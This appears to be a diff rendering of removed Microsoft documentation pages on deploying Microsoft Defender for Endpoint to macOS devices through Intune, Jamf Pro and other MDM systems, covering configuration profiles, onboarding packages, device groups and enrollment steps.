-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `FullDiskAccess-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Fulldisk.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 5: Notifications
-
-This profile is used to allow Microsoft Defender for Endpoint on macOS and Microsoft AutoUpdate to display notifications in UI.
-
-Download [notif.mobileconfig](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/notif.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-To turn off notifications for the end users, you can change **Show NotificationCenter** from `true` to `false` in
-[notif.mobileconfig](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/notif.mobileconfig).
--
-To configure notifications:
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `FullDiskAccess-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Notification.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 6: Accessibility settings
-
-This profile is used to allow Microsoft Defender for Endpoint on macOS to access the accessibility settings on Apple macOS High Sierra (10.13.6) and newer.
-
-Download [accessibility.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/accessibility.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `Accessibility-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Accessibility.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 7: Bluetooth permissions
-
- > [!CAUTION]
- > macOS 14 (Sonoma) contains new privacy enhancements. Beginning with this version, by default, applications cannot access Bluetooth without explicit consent. Microsoft Defender for Endpoint uses it if you configure Bluetooth policies for Device Control.
-
-Download [bluetooth.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/bluetooth.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles) and use the same workflow as for the Accessibility settings above to enable Bluetooth access.
-
-> [!NOTE]
-> Bluetooth granted through Apple MDM Configuration Profile is not reflected in System Settings => Privacy & Security => Bluetooth.
-
-### Step 8: Microsoft AutoUpdate
-
-This profile is used to update the Microsoft Defender for Endpoint on macOS via Microsoft AutoUpdate (MAU). If you're deploying Microsoft Defender for Endpoint on macOS, you have the options to get an updated version of the application (Platform Update) that are in the different channels mentioned here:
--- Beta (Insiders-Fast)-- Current channel (Preview, Insiders-Slow)-- Current channel (Production)-
-For more information, see [Deploy updates for Microsoft Defender for Endpoint on macOS](mac-updates.md).
-
-Download [AutoUpdate2.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/settings/microsoft_auto_update/com.microsoft.autoupdate2.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-> [!NOTE]
-> The sample AutoUpdate2.mobileconfig from the GitHub repository has it set to Current Channel (Production).
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `Autoupdate-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Autoupdate.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 9: Microsoft Defender for Endpoint configuration settings
-
-In this step, we go over the "Preferences," which enables you to configure anti-malware and EDR policies using Microsoft Defender portal and Microsoft Intune.
-
-#### Set policies using Microsoft Defender portal
-
-Go through [Configure Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure) before setting the security policies using Microsoft Defender.
-
-In the [Microsoft Defender portal](https://sip.security.microsoft.com/homepage?tid=72f988bf-86f1-41af-91ab-2d7cd011db47):
-
-1. Go to **Configuration management** > **Endpoint security policies** > **Mac policies** > **Create new policy**.
-
-1. Under **Select Platform**, select **macOS**.
-
-1. Under **Select Template**, choose a template and select **Create Policy**.
-
-1. Enter the Name and Description of the policy.
-
-1. Select **Next**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-For more information about managing security settings, see:
--- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration?pivots=mdssc-ga)-- [Manage security settings for Windows, macOS, and Linux natively in Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/manage-security-settings-for-windows-macos-and-linux-natively-in/ba-p/3870617)--
-#### Set policies using Microsoft Intune
-
-You can manage the security settings for Microsoft Defender for Endpoint on macOS under **Setting Preferences** in Microsoft Intune.
-
-For more information, see [Set preferences for Microsoft Defender for Endpoint on Mac](mac-preferences.md).
-
-### Step 10: Network protection for Microsoft Defender for Endpoint on macOS
-
-In the [Microsoft Defender portal](https://sip.security.microsoft.com/homepage?tid=72f988bf-86f1-41af-91ab-2d7cd011db47):
-
-1. Go to **Configuration management** > **Endpoint security policies** > **Mac policies** > **Create new policy**.
-
-1. Under **Select Platform**, select **macOS**.
-
-1. Under **Select Template**, select **Microsoft Defender Antivirus** and select **Create Policy**.
-
- :::image type="content" alt-text="networkprotection" source="media/network-protection1.jpg" lightbox="media/network-protection1.jpg":::
-
-1. On the **Basics** tab, enter the **Name** and **Description** of the policy. Select **Next**.
-
- :::image type="content" source="media/networkprotection2.png" alt-text="Basicstab":::
-
-1. On the **Configuration Settings** tab, under Network Protection, select an **Enforcement level**. Select **Next**.
-
- :::image type="content" source="media/networkprotection3.png" alt-text="configurationsettings":::
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
- :::image type="content" source="media/networkprotection4.png" alt-text="np4":::
-
-1. Review the policy in **Review+Create** and select **Save**.
--
-> [!TIP]
-> You can also configure network protection by appending the information from [**Network protection to help prevent macOS connections to bad sites**](network-protection-macos.md) to the .mobileconig from step 8.
-
-### Step 11: Device Control for Microsoft Defender for Endpoint on macOS
-
-To set Device Control for Microsoft Defender for Endpoint on macOS, follow the steps in:
--- [Device Control for macOS](mac-device-control-overview.md)-- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)-
-### Step 12: Data Loss Prevention (DLP) for Endpoint
-
-To set Purview's Data Loss Prevention (DLP) for endpoint on macOS, follow the steps in [Onboard and offboard macOS devices into Compliance solutions using Microsoft Intune](/purview/device-onboarding-offboarding-macos-intune-mde).
-
-### Step 13: Check status of PList(.mobileconfig)
-
-After completing the profile configuration, you'll be able to review the status of the policies.
-
-#### View Status
-
-Once the Intune changes are propagated to the enrolled devices, you can see them listed under **Monitor** \> **Device status**:
--
-#### Client device setup
-
-A standard [Company Portal installation](/intune-user-help/enroll-your-device-in-intune-macos-cp) is sufficient for a mac device.
-
-1. Confirm device management.
-
- :::image type="content" source="medievicemgmt.png":::
-
- Select **Open System Preferences**, locate **Management Profile** on the list, and select **Approve...**. Your Management Profile would be displayed as **Verified**:
-
- :::image type="content" source="mediatp-4-managementprofile.png":::
-
-2. Select **Continue** and complete the enrollment.
-
- You may now enroll more devices. You can also enroll them later, after finishing the provisioning system configuration and application packages.
-
-3. In Intune, open **Manage** \> **Devices** \> **All devices**. Here you can see your device among the listed:
-
- :::image type="content" source="mediatp-5-alldevices.png":::
-
-#### Verify client device state
-
-1. After the configuration profiles are deployed to your devices, open **System Preferences** > **Profiles** on your Mac device.
-
- :::image type="content" source="media/mdatp-13-systempreferences.png" alt-text="The System preferences page":::
-
- :::image type="content" source="mediatp-14-systempreferencesprofiles.png":::
-
-2. Verify that the following configuration profiles are present and installed. The **Management Profile** should be the Intune system profile. _Wdav-config_ and _wdav-kext_ are system configuration profiles that were added in Intune:
-
- :::image type="content" source="mediatp-15-managementprofileconfig.png":::
-
-3. You should also see the Microsoft Defender for Endpoint icon in the top-right corner.
-
- :::image type="content" source="media/mdatp-icon-bar.png" alt-text="The icon for Microsoft Defender for Endpoint in the status bar":::
-
-### Step 14: Publish application
-
-This step enables deploying Microsoft Defender for Endpoint to enrolled machines.
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), open **Apps**.
-
- :::image type="content" source="mediatp-8-app-before.png":::
-
-1. Select **By platform** > **macOS** > **Add**.
-
-1. Under **App type**, select **macOS**. Select **Select**.
-
- :::image type="content" source="mediatp-9-app-type.png":::
-
-1. On the **App information**, keep the default values and select **Next**.
-
- :::image type="content" source="mediatp-10-properties.png":::
-
-1. On the **Assignments** tab, select **Next**.
-
- :::image type="content" source="mediatp-11-assignments.png":::
-
-1. Review and **Create**.
-You can visit **Apps** > **By platform** > **macOS** to see it on the list of all applications.
-
- :::image type="content" source="mediatp-12-applications.png":::
-
-For more information, see [Add Microsoft Defender for Endpoint to macOS devices using Microsoft Intune](/mem/intune/apps/apps-advanced-threat-protection-macos).
-
-> [!IMPORTANT]
-> You should create and deploy the configuration profiles in the above order (step 1-13) for a successful system configuration.
-
-#### Step 15: Download the onboarding package
-
-To download the onboarding packages from Microsoft 365 Defender portal:
-
-1. In the Microsoft 365 Defender portal, go to **Settings** > **Endpoints** > **Device management** > **Onboarding**.
-
-2. Set the operating system to **macOS** and the deployment method to **Mobile Device Management / Microsoft Intune**.
-
- :::image type="content" source="media/macos-install-with-intune.png" alt-text="The Onboarding settings page" lightbox="media/macos-install-with-intune.png":::
-
-3. Select **Download onboarding package**. Save it as _WindowsDefenderATPOnboardingPackage.zip_ to the same directory.
-
-4. Extract the contents of the .zip file:
-
- ```bash
- unzip WindowsDefenderATPOnboardingPackage.zip
- ```
-
- ```console
- Archive: WindowsDefenderATPOnboardingPackage.zip
- warning: WindowsDefenderATPOnboardingPackage.zip appears to use backslashes as path separators
- inflating: intune/kext.xml
- inflating: intune/WindowsDefenderATPOnboarding.xml
- inflating: jamf/WindowsDefenderATPOnboarding.plist
- ```
-
- :::image type="content" alt-text="Sample description" source="media/deploy-onboarding-package.png" lightbox="media/deploy-onboarding-package.png":::
-
-### Step 16: Deploy the onboarding package
-
-This profile contains license information for Microsoft Defender for Endpoint.
-
-To deploy the onboarding package:
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
- :::image type="content" alt-text="Deploy onboarding package" source="mediatp-6-systemconfigurationprofiles-1.png":::
-
-1. On the **Basics** tab, **Name** the profile. For example, `Autoupdate-prod-macOS-Default-MDE`. Select **Next**.
-
- :::image type="content" alt-text="click next" source="mediatp-6-systemconfigurationprofiles-2.png":::
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Autoupdate.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
- :::image type="content" alt-text="configuration profile" source="mediatp-6-systemconfigurationprofiles.png":::
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
- :::image type="content" alt-text="assign users" source="mediatp-6-systemconfigurationprofiles-3.png":::
-
-1. Review the configuration profile. Select **Create**.
-
-1. Open **Devices** > **Configuration profiles** to see the created profile.
-
-## Step 17: Verify anti-malware detection
-
-See the following article to test for an anti-malware detection review: [Antivirus detection test for verifying device's onboarding and reporting services](validate-antimalware.md)
-
-## Step 18: Verifying EDR detection
-
-See the following article to test for an EDR detection review: [EDR detection test for verifying device onboarding and reporting services](edr-detection.md)
-
-## Troubleshooting
-
-Issue: No license found.
-
-Solution: Follow the steps in this article to create a device profile using WindowsDefenderATPOnboarding.xml.
-
-## Logging installation issues
-
-See [Logging installation issues](mac-resources.md#logging-installation-issues) for information on how to find the automatically generated log created by the installer, when an error occurs.
-
-For information on troubleshooting procedures, see:
--- [Troubleshoot system extension issues in Microsoft Defender for Endpoint on macOS](mac-support-sys-ext.md)-- [Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS](mac-support-install.md)-- [Troubleshoot license issues for Microsoft Defender for Endpoint on macOS](mac-support-license.md)-- [Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS](troubleshoot-cloud-connect-mdemac.md)-- [Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS](mac-support-perf.md)-
-## Uninstallation
-
-See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
-
-## Recommended content
-
-[Add Microsoft Defender for Endpoint to macOS devices using Microsoft Intune](/mem/intune/apps/apps-advanced-threat-protection-macos?source=recommendations)
-
-Learn about adding Microsoft Defender for Endpoint to macOS devices using Microsoft Intune.
-
-[Examples of device control policies for Intune](mac-device-control-intune.md)
-<br>Learn how to use device control policies using examples that can be used with Intune.
-
-[Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-<br>Describes how to deploy Microsoft Defender for Endpoint on iOS features.
-
-[Deploy Microsoft Defender for Endpoint on iOS with Microsoft Intune](ios-install.md)
-<br>Describes how to deploy Microsoft Defender for Endpoint on iOS using an app.
-
-[Configure Microsoft Defender for Endpoint in Microsoft Intune](/mem/intune/protect/advanced-threat-protection-configure?source=recommendations)
-<br>Describes connecting to Defender for Endpoint, onboarding devices, assigning compliance for risk levels, and conditional access policies.
-
-[Troubleshoot issues and find answers on FAQs related to Microsoft Defender for Endpoint on iOS](ios-troubleshoot.md)
-<br>Troubleshooting and FAQ - Microsoft Defender for Endpoint on iOS.
-
-[Configure Microsoft Defender for Endpoint on Android features](android-configure.md)
-<br>Describes how to configure Microsoft Defender for Endpoint on Android.
-
-[Manage Defender for Endpoint on Android devices in Intune - Azure](/mem/intune/protect/advanced-threat-protection-manage-android?source=recommendations)
-<br>Configure Microsoft Defender for Endpoint web protection on Android devices managed by Microsoft Intune.
---
security Mac Install With Jamf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-jamf.md
- Title: Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro
-description: Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
--
-This is a multi-step process. You'll need to complete all of the following steps:
--- [Login to the Jamf Portal](mac-install-jamfpro-login.md)-- [Setup the Microsoft Defender for Endpoint on macOS device groups in Jamf Pro](mac-jamfpro-device-groups.md)-- [Setup the Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md)-- [Enroll the Microsoft Defender for Endpoint on macOS devices into Jamf Pro](mac-jamfpro-enroll-devices.md)---
security Mac Install With Other Mdm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-other-mdm.md
- Title: Deployment with a different Mobile Device Management (MDM) system for Microsoft Defender for Endpoint on Mac
-description: Install Microsoft Defender for Endpoint on Mac on other management solutions.
-------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Deployment with a different Mobile Device Management (MDM) system for Microsoft Defender for Endpoint on macOS
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-## Prerequisites and system requirements
-
-Before you get started, see [the main Microsoft Defender for Endpoint on macOS page](microsoft-defender-endpoint-mac.md) for a description of prerequisites and system requirements for the current software version.
--
-## Approach
-
-> [!CAUTION]
-> Currently, Microsoft officially supports only Intune and JAMF for the deployment and management of Microsoft Defender for Endpoint on macOS. Microsoft makes no warranties, express or implied, with respect to the information provided below.
-
-If your organization uses a Mobile Device Management (MDM) solution that isn't officially supported, this doesn't mean you're unable to deploy or run Microsoft Defender for Endpoint on macOS.
-
-Microsoft Defender for Endpoint on macOS doesn't depend on any vendor-specific features. It can be used with any MDM solution that supports the following features:
--- Deploy a macOS .pkg to managed devices.-- Deploy macOS system configuration profiles to managed devices.-- Run an arbitrary admin-configured tool/script on managed devices.-
-Most modern MDM solutions include these features, however, they may call them differently.
-
-You can deploy Defender for Endpoint without the last requirement from the preceding list, however:
--- You won't be able to collect status in a centralized way.-- If you decide to uninstall Defender for Endpoint, you'll need to log on to the client device locally as an administrator.-
-## Deployment
-
-Most MDM solutions use the same model for managing macOS devices, with similar terminology. Use [JAMF-based deployment](mac-install-with-jamf.md) as a template.
-
-### Package
-
-Configure deployment of a [required application package](mac-install-with-jamf.md),
-with the installation package (wdav.pkg) downloaded from [Microsoft Defender portal](mac-install-with-jamf.md).
----
-In order to deploy the package to your enterprise, use the instructions associated with your MDM solution.
-
-### License settings
-
-Set up [a system configuration profile](mac-install-with-jamf.md).
-
-Your MDM solution may call it something like "Custom Settings Profile", as Microsoft Defender for Endpoint on macOS isn't part of macOS.
-
-Use the property list, jamf/WindowsDefenderATPOnboarding.plist, which can be extracted from an onboarding package downloaded from [Microsoft Defender portal](mac-install-with-jamf.md).
-Your system may support an arbitrary property list in XML format. You can upload the jamf/WindowsDefenderATPOnboarding.plist file as-is in that case.
-Alternatively, it may require you to convert the property list to a different format first.
-
-Typically, your custom profile has an ID, name, or domain attribute. You must use exactly "com.microsoft.wdav.atp" for this value.
-MDM uses it to deploy the settings file to **/Library/Managed Preferences/com.microsoft.wdav.atp.plist** on a client device, and Defender for Endpoint uses this file for loading the onboarding information.
-
-### System configuration profiles
-
-macOS requires that a user manually and explicitly approves certain functions that an application uses, for example system extensions, running in background, sending notifications, full disk access etc. Microsoft Defender for Endpoint relies on these functions, and can't properly function until all these consents are received from a user.
-
-To grant consent automatically on a user's behalf, an administrator pushes system policies through their MDM system. This is what we strongly recommend doing, instead of relying on manual approvals from end users.
-
-We supply all policies that Microsoft Defender for Endpoint requires as mobileconfig files available at [https://github.com/microsoft/mdatp-xplat](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles). Mobileconfig is an Apple's import/export format that [Apple Configurator](https://support.apple.com/apple-configurator) or other products like [iMazing Profile Editor](https://imazing.com/profile-editor) support.
-
-Most MDM vendors support importing a mobileconfig file, creating a new custom configuration profile.
-
-To set up profiles:
-
-1) Find out how a mobileconfig import is done with your MDM vendor.
-2) For all profiles from [https://github.com/microsoft/mdatp-xplat](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles), download a mobileconfig file and import it.
-3) Assign proper scope for each created configuration profile.
-
-Note that Apple regularly creates new types of payloads with new versions of OS.
-You'll have to visit the above mentioned page, and publish new profiles once they became available.
-We post notifications to our [What's New page](mac-whatsnew.md) once we make changes like that.
-
-## Check installation status
-
-Run [Microsoft Defender for Endpoint](mac-install-with-jamf.md) on a client device to check the onboarding status.
security Mac Jamfpro Device Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-device-groups.md
- Title: Set up device groups in Jamf Pro
-description: Learn how to set up device groups in Jamf Pro for Microsoft Defender for Endpoint on macOS
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Set up Microsoft Defender for Endpoint on macOS device groups in Jamf Pro
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-Set up the device groups similar to Group policy organizational unite (OUs), Microsoft Endpoint Configuration Manager's device collection, and Intune's device groups.
-
-1. Navigate to **Static Computer Groups**.
-
-2. Select **New**.
-
- :::image type="content" source="media/jamf-pro-static-group.png" alt-text="The Jamf Pro1 page" lightbox="media/jamf-pro-static-group.png":::
-
-3. Provide a display name and select **Save**.
-
- :::image type="content" source="media/jamfpro-machine-group.png" alt-text="The Jamf Pro2 page" lightbox="media/jamfpro-machine-group.png":::
-
-4. Now you will see the **Contoso's Machine Group** under **Static Computer Groups**.
-
- :::image type="content" source="media/contoso-machine-group.png" alt-text="The Jamf Pro3 page" lightbox="media/contoso-machine-group.png":::
-
-> [!NOTE]
-> You are not required to use static groups. It is often more convenient and flexible to use e.g. [JAMF Pro's smart groups](https://docs.jamf.com/10.40.0/jamf-pro/documentation/Smart_Groups.html) instead.
-
-## Next step
-- [Set up Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md)
security Mac Jamfpro Enroll Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-enroll-devices.md
- Title: Enroll Microsoft Defender for Endpoint on macOS devices into Jamf Pro
-description: Enroll Microsoft Defender for Endpoint on macOS devices into Jamf Pro
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Enroll Microsoft Defender for Endpoint on macOS devices into Jamf Pro
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-## Enroll macOS devices
-
-There are multiple methods of getting enrolled to JamF.
-
-This article will guide you on two methods:
--- [Method 1: Enrollment Invitations](#enrollment-method-1-enrollment-invitations)-- [Method 2: Prestage Enrollments](#enrollment-method-2-prestage-enrollments)-
-For a complete list, see [About Computer Enrollment](https://docs.jamf.com/9.9/casper-suite/administrator-guide/About_Computer_Enrollment.html).
-
-## Enrollment Method 1: Enrollment Invitations
-
-1. In the Jamf Pro dashboard, navigate to **Enrollment invitations**.
-
- :::image type="content" source="media/a347307458d6a9bbfa88df7dbe15398f.png" alt-text="The configuration settings1" lightbox="media/a347307458d6a9bbfa88df7dbe15398f.png":::
-
-2. Select **+ New**.
-
- :::image type="content" source="media/b6c7ad56d50f497c38fc14c1e315456c.png" alt-text="The close up of a logo description automatically generated" lightbox="media/b6c7ad56d50f497c38fc14c1e315456c.png":::
-
-3. In **Specify Recipients for the Invitation** > under **Email Addresses** enter the e-mail address(es) of the recipients.
-
- :::image type="content" source="media/718b9d609f9f77c8b13ba88c4c0abe5d.png" alt-text="The configuration settings2" lightbox="media/718b9d609f9f77c8b13ba88c4c0abe5d.png":::
-
- :::image type="content" source="media/ae3597247b6bc7c5347cf56ab1e820c0.png" alt-text="The configuration settings3" lightbox="media/ae3597247b6bc7c5347cf56ab1e820c0.png":::
-
- For example: janedoe@contoso.com
-
- :::image type="content" source="media/4922c0fcdde4c7f73242b13bf5e35c19.png" alt-text="The configuration settings4" lightbox="media/4922c0fcdde4c7f73242b13bf5e35c19.png":::
-
-4. Configure the message for the invitation.
-
- :::image type="content" source="media/ce580aec080512d44a37ff8e82e5c2ac.png" alt-text="The configuration settings5" lightbox="media/ce580aec080512d44a37ff8e82e5c2ac.png":::
-
- :::image type="content" source="media/5856b765a6ce677caacb130ca36b1a62.png" alt-text="The configuration settings6" lightbox="media/5856b765a6ce677caacb130ca36b1a62.png":::
-
- :::image type="content" source="media/3ced5383a6be788486d89d407d042f28.png" alt-text="The configuration settings7" lightbox="media/3ced5383a6be788486d89d407d042f28.png":::
-
- :::image type="content" source="media/54be9c6ed5b24cebe628dc3cd9ca4089.png" alt-text="The configuration settings8" lightbox="media/54be9c6ed5b24cebe628dc3cd9ca4089.png":::
-
-## Enrollment Method 2: Prestage Enrollments
-
-1. In the Jamf Pro dashboard, navigate to **Prestage enrollments**.
-
- :::image type="content" source="media/6fd0cb2bbb0e60a623829c91fd0826ab.png" alt-text="The configuration settings9" lightbox="media/6fd0cb2bbb0e60a623829c91fd0826ab.png":::
-
-2. Follow the instructions in [Computer PreStage Enrollments](https://docs.jamf.com/9.9/casper-suite/administrator-guide/Computer_PreStage_Enrollments.html).
-
-## Enroll macOS device
-
-1. Select **Continue** and install the CA certificate from a **System Preferences** window.
-
- :::image type="content" source="media/jamfpro-ca-certificate.png" alt-text="The Jamf Pro enrollment1" lightbox="media/jamfpro-ca-certificate.png":::
-
-2. Once CA certificate is installed, return to the browser window and select **Continue** and install the MDM profile.
-
- :::image type="content" source="medim-profile.png":::
-
-3. Select **Allow** to downloads from JAMF.
-
- :::image type="content" source="media/jamfpro-download.png" alt-text="The Jamf Pro enrollment3" lightbox="media/jamfpro-download.png":::
-
-4. Select **Continue** to proceed with the MDM Profile installation.
-
- :::image type="content" source="medim.png":::
-
-5. Select **Continue** to install the MDM Profile.
-
- :::image type="content" source="medim-unverified.png":::
-
-6. Select **Continue** to complete the configuration.
-
- :::image type="content" source="medim-profile.png":::
security Mac Jamfpro Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-policies.md
- Title: Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro
-description: Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro
---
-**Applies to:**
-- [Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This page will guide you through the steps you need to take to set up macOS policies in Jamf Pro.
-
-You'll need to take the following steps:
-
-1. [Get the Microsoft Defender for Endpoint onboarding package](#step-1-get-the-microsoft-defender-for-endpoint-onboarding-package)
-2. [Create a configuration profile in Jamf Pro using the onboarding package](#step-2-create-a-configuration-profile-in-jamf-pro-using-the-onboarding-package)
-3. [Configure Microsoft Defender for Endpoint settings](#step-3-configure-microsoft-defender-for-endpoint-settings)
-4. [Configure Microsoft Defender for Endpoint notification settings](#step-4-configure-notifications-settings)
-5. [Configure Microsoft AutoUpdate (MAU)](#step-5-configure-microsoft-autoupdate-mau)
-6. [Grant full disk access to Microsoft Defender for Endpoint](#step-6-grant-full-disk-access-to-microsoft-defender-for-endpoint)
-7. [Approve System extensions for Microsoft Defender for Endpoint](#step-7-approve-system-extensions-for-microsoft-defender-for-endpoint)
-8. [Configure Network Extension](#step-8-configure-network-extension)
-9. [Configure Background Services](#step-9-configure-background-services)
-10. [Grant Bluetooth Permissions](#step-10-grant-bluetooth-permissions)
